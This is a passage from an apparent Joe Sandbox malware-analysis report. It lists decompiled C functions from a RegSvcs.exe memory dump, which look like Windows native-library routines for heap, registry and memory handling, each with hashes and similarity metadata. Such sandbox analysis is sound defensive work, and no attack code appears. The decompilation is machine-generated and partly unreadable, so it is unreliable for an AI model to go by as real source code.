						E013B138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01317D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E013AFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x13e8724 & 0x00000008) != 0) {
						E013B52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E013C15B5(0x13e8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                          0x013c0eb7
                                          0x013c0eb9
                                          0x013c0ec0
                                          0x013c0ec2
                                          0x013c0ecd
                                          0x013c105b
                                          0x013c105b
                                          0x013c1061
                                          0x013c1066
                                          0x013c1066
                                          0x013c106b
                                          0x013c1073
                                          0x013c1073
                                          0x013c0ed3
                                          0x013c0ed6
                                          0x013c0edc
                                          0x013c0ee0
                                          0x013c0ee7
                                          0x013c0ef0
                                          0x013c0ef5
                                          0x013c0efa
                                          0x013c0efc
                                          0x013c0efd
                                          0x013c0f03
                                          0x013c0f04
                                          0x013c0f06
                                          0x013c0f07
                                          0x013c0f09
                                          0x013c0f0e
                                          0x013c0f14
                                          0x013c0f23
                                          0x013c0f2d
                                          0x013c0f34
                                          0x013c0f34
                                          0x013c0f14
                                          0x013c0f52
                                          0x00000000
                                          0x00000000
                                          0x013c0f58
                                          0x013c0f73
                                          0x013c0f74
                                          0x013c0f79
                                          0x013c0f7d
                                          0x013c0f80
                                          0x013c0f86
                                          0x013c0fab
                                          0x013c0fb5
                                          0x013c0fc6
                                          0x013c0fd1
                                          0x013c0fe3
                                          0x013c0fd3
                                          0x013c0fdc
                                          0x013c0fdc
                                          0x013c0feb
                                          0x013c1009
                                          0x013c1009
                                          0x013c1015
                                          0x013c1027
                                          0x013c1017
                                          0x013c1020
                                          0x013c1020
                                          0x013c102f
                                          0x013c103c
                                          0x013c103c
                                          0x013c1048
                                          0x013c1050
                                          0x013c1050
                                          0x013c1055
                                          0x00000000
                                          0x013c1055
                                          0x013c0f88
                                          0x013c0f9e
                                          0x013c0fa2
                                          0x013c0fa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c0fa9
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 509d8f2d6e4356fa9667979c6dbb01b08b2322e71f1527a9eac31b0e95c6eb0e
                                          • Instruction ID: 82501cd2a37f6f20d221ba4c4670d2845354f33e0bdead2b7192f1c99b513368
                                          • Opcode Fuzzy Hash: 509d8f2d6e4356fa9667979c6dbb01b08b2322e71f1527a9eac31b0e95c6eb0e
                                          • Instruction Fuzzy Hash: E8517D71304382DBD325DF28D984B1BBBE9EBC4B18F04092CFA9697691D671EC49C762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E0132F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01314120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01339830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01339990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E013395D0();
							goto L11;
						} else {
							_t109 = L01314620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0133F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E013395D0();
										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                          0x0132f0d3
                                          0x0132f0d9
                                          0x0132f0e0
                                          0x0132f0e7
                                          0x0132f0f2
                                          0x0132f0f4
                                          0x0132f0f8
                                          0x0132f100
                                          0x0132f108
                                          0x0132f10d
                                          0x0132f115
                                          0x0132f116
                                          0x0132f11f
                                          0x0132f123
                                          0x0132f124
                                          0x0132f12c
                                          0x0132f130
                                          0x0132f134
                                          0x0132f13d
                                          0x0132f144
                                          0x0132f14b
                                          0x0132f152
                                          0x0136bab0
                                          0x0136bab0
                                          0x0132f158
                                          0x0132f158
                                          0x0132f15a
                                          0x0132f160
                                          0x0132f165
                                          0x0132f166
                                          0x0132f16f
                                          0x0132f173
                                          0x0136baa7
                                          0x0136baa7
                                          0x0136baab
                                          0x00000000
                                          0x0132f179
                                          0x0132f18d
                                          0x0132f191
                                          0x0136baa2
                                          0x00000000
                                          0x0132f197
                                          0x0132f19b
                                          0x0132f1a2
                                          0x0132f1a9
                                          0x0132f1af
                                          0x0132f1b2
                                          0x0132f1b6
                                          0x0132f1b9
                                          0x0132f1c4
                                          0x0132f1d8
                                          0x0132f1df
                                          0x0132f1e3
                                          0x0132f1eb
                                          0x0132f1ee
                                          0x0132f1f4
                                          0x0132f20f
                                          0x0136bab7
                                          0x0136babb
                                          0x0136bacc
                                          0x0136bad1
                                          0x0132f215
                                          0x0132f218
                                          0x0132f226
                                          0x0132f22b
                                          0x00000000
                                          0x0132f22b
                                          0x0132f1f6
                                          0x0132f1f6
                                          0x0132f1f9
                                          0x0132f1fb
                                          0x0132f1fb
                                          0x0132f1f4
                                          0x0132f191
                                          0x0132f173
                                          0x0132f152
                                          0x0132f203

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: d2f0875c4ce64916c3d4e20c30301604b43b42c965b1b5f9d15bc6cb5752dd8c
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 3F518D716047119FD321DF19C840A6BBBF8FF98718F108A2DFA9587690E7B4E904CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01373540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E01373540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x13ed360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01330BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01373706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0133FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01373540;
						E0133FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0134DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01380C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E013397C0();
					}
					return E0133B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01373971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01373884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0133FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01339650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01373787(_a4,  &_v352, _t80);
						}
					}
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E013395D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                          0x01373552
                                          0x0137355a
                                          0x0137355d
                                          0x01373566
                                          0x01373567
                                          0x0137357e
                                          0x0137358f
                                          0x013735a1
                                          0x013735a5
                                          0x0137366b
                                          0x0137366b
                                          0x0137366d
                                          0x01373672
                                          0x01373679
                                          0x01373685
                                          0x0137368d
                                          0x0137369d
                                          0x013736a7
                                          0x013736b8
                                          0x013736c6
                                          0x013736c7
                                          0x013736dc
                                          0x013736e1
                                          0x013736e7
                                          0x013736e9
                                          0x013736e9
                                          0x01373703
                                          0x01373703
                                          0x013735b5
                                          0x013735c0
                                          0x013735c4
                                          0x00000000
                                          0x00000000
                                          0x013735ca
                                          0x013735d7
                                          0x013735e2
                                          0x013735e6
                                          0x013735e8
                                          0x013735f5
                                          0x013735fa
                                          0x01373603
                                          0x01373604
                                          0x01373609
                                          0x0137360a
                                          0x01373612
                                          0x01373613
                                          0x0137361e
                                          0x01373622
                                          0x01373628
                                          0x0137362f
                                          0x0137362f
                                          0x01373636
                                          0x01373638
                                          0x0137363b
                                          0x01373642
                                          0x01373642
                                          0x01373636
                                          0x01373657
                                          0x01373657
                                          0x0137365c
                                          0x01373662
                                          0x01373669
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 0f2c9ee91affb6ea4b390fac063b272cfccbc01bc318a684882fa4824fcbc0bd
                                          • Instruction ID: 9512a2ea6a4825a6324f950164c36e6087ac5e3b8056288131f68252e6b373cc
                                          • Opcode Fuzzy Hash: 0f2c9ee91affb6ea4b390fac063b272cfccbc01bc318a684882fa4824fcbc0bd
                                          • Instruction Fuzzy Hash: B74177B1D0052D9BDB21DA54CC80FEEB77CAB4472CF0045A5EA08AB240DB349E88DF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E013C05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E013C07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01339730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E013BA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E013BA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E013C1293(_t79, _v40, E013C07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01317D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E013B138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                          0x013c05c5
                                          0x013c05ca
                                          0x013c05d3
                                          0x013c06db
                                          0x013c06db
                                          0x013c06dd
                                          0x013c06e3
                                          0x013c06e3
                                          0x013c05dd
                                          0x013c05e7
                                          0x013c05f6
                                          0x013c0600
                                          0x013c0607
                                          0x013c0610
                                          0x013c0615
                                          0x013c061a
                                          0x013c061c
                                          0x013c061e
                                          0x013c0624
                                          0x013c0625
                                          0x013c0627
                                          0x013c0628
                                          0x013c0631
                                          0x013c0640
                                          0x013c064d
                                          0x013c0654
                                          0x013c0654
                                          0x013c0631
                                          0x013c066d
                                          0x013c0674
                                          0x00000000
                                          0x00000000
                                          0x013c0692
                                          0x013c069e
                                          0x013c06b0
                                          0x013c06a0
                                          0x013c06a9
                                          0x013c06a9
                                          0x013c06b8
                                          0x013c06d6
                                          0x013c06d6
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: e429f1005adb4f848361513d93bd7ed81abd2415cc51abf7a9fbac713023e95c
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: DA310832200345ABE714DE68CC85F977BD9EBC4B68F144129FA54DB680D770ED14CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01373884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E01373884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01339650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01314620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01339650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                          0x01373893
                                          0x01373896
                                          0x01373899
                                          0x0137389f
                                          0x013738a0
                                          0x013738a4
                                          0x013738a9
                                          0x013738ac
                                          0x013738ad
                                          0x013738ae
                                          0x013738af
                                          0x013738b1
                                          0x013738b4
                                          0x013738bb
                                          0x013738bc
                                          0x013738bd
                                          0x013738c4
                                          0x013738c8
                                          0x013738ca
                                          0x013738ca
                                          0x013738d5
                                          0x0137393e
                                          0x01373940
                                          0x01373942
                                          0x01373952
                                          0x01373954
                                          0x01373961
                                          0x01373961
                                          0x01373967
                                          0x0137396e
                                          0x0137396e
                                          0x01373947
                                          0x0137394c
                                          0x00000000
                                          0x0137394c
                                          0x013738ea
                                          0x013738ee
                                          0x013738f8
                                          0x013738f9
                                          0x013738ff
                                          0x01373900
                                          0x01373902
                                          0x01373903
                                          0x0137390b
                                          0x0137390f
                                          0x01373950
                                          0x00000000
                                          0x01373950
                                          0x01373915
                                          0x0137391d
                                          0x0137391d
                                          0x01373922
                                          0x01373926
                                          0x00000000
                                          0x01373928
                                          0x0137392b
                                          0x0137392b
                                          0x01373935
                                          0x01373937
                                          0x01373937
                                          0x00000000
                                          0x01373935
                                          0x01373926
                                          0x013738f0
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 3dbd42ca2e91efd755a79d118df2c510cbcdaa226a93b2d4d79954e04830905a
                                          • Instruction ID: b51c4349d570e939762d504d14e31fd3bbeb380ccc817f7cbad875bb02003f88
                                          • Opcode Fuzzy Hash: 3dbd42ca2e91efd755a79d118df2c510cbcdaa226a93b2d4d79954e04830905a
                                          • Instruction Fuzzy Hash: 5231037290150AFFEB25DA5CC945FBBBBB8FF81B28F014169E914A7280D7349E00D7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 33%
                                          			E0132D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x13ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01314120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0133B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E013398D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E013395D0();
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                          0x0132d29c
                                          0x0132d2a6
                                          0x0132d2b1
                                          0x0132d2b5
                                          0x0132d2b6
                                          0x0132d2bc
                                          0x0132d2bd
                                          0x0132d2be
                                          0x0132d2bf
                                          0x0132d2c2
                                          0x0132d2c4
                                          0x0132d2cc
                                          0x0132d384
                                          0x0132d34b
                                          0x0132d34f
                                          0x0132d350
                                          0x0132d351
                                          0x0132d35c
                                          0x0132d35c
                                          0x0132d2d6
                                          0x0132d2da
                                          0x0132d2e1
                                          0x0132d361
                                          0x0132d369
                                          0x0132d36d
                                          0x0132d2e3
                                          0x0132d2e3
                                          0x0132d2e3
                                          0x0132d2e5
                                          0x0132d2ed
                                          0x0132d2f5
                                          0x0132d2fa
                                          0x0132d302
                                          0x0132d303
                                          0x0132d30b
                                          0x0132d30f
                                          0x0132d313
                                          0x0132d318
                                          0x0132d31c
                                          0x0132d320
                                          0x0132d379
                                          0x0132d37d
                                          0x00000000
                                          0x00000000
                                          0x0136affe
                                          0x0136b001
                                          0x0136b011
                                          0x00000000
                                          0x0132d322
                                          0x0132d322
                                          0x0132d330
                                          0x0132d337
                                          0x0132d35d
                                          0x0132d339
                                          0x0132d33f
                                          0x0132d38c
                                          0x0132d38c
                                          0x0132d33f
                                          0x0132d349
                                          0x00000000
                                          0x0132d349

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 5101cd4958cf86a672df27d1f1595bb19b832ad6b408a7d5e9431ea7ace97433
                                          • Instruction ID: 176ed93c526a30435c7f3eef462fe5b65d660f79e3a2a01ae4b172866f18f1bc
                                          • Opcode Fuzzy Hash: 5101cd4958cf86a672df27d1f1595bb19b832ad6b408a7d5e9431ea7ace97433
                                          • Instruction Fuzzy Hash: 6E318DB2508315DFD321EF68C980A6BBBE8FBD9758F00092EFA9493650D634DD05CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01301B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E01301B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0133BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0133A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0133A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01314620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                          0x01301b8f
                                          0x01301b9a
                                          0x01301b9c
                                          0x01301b9e
                                          0x01301ba3
                                          0x01357010
                                          0x01357010
                                          0x00000000
                                          0x01301ba9
                                          0x01301ba9
                                          0x01301bae
                                          0x00000000
                                          0x01301bc5
                                          0x01301bca
                                          0x01301bcf
                                          0x01301bd0
                                          0x01301bd1
                                          0x01301bd2
                                          0x01301bd6
                                          0x01301bdc
                                          0x01301be0
                                          0x01356ffc
                                          0x01357000
                                          0x00000000
                                          0x01357006
                                          0x01357009
                                          0x01357009
                                          0x01301be6
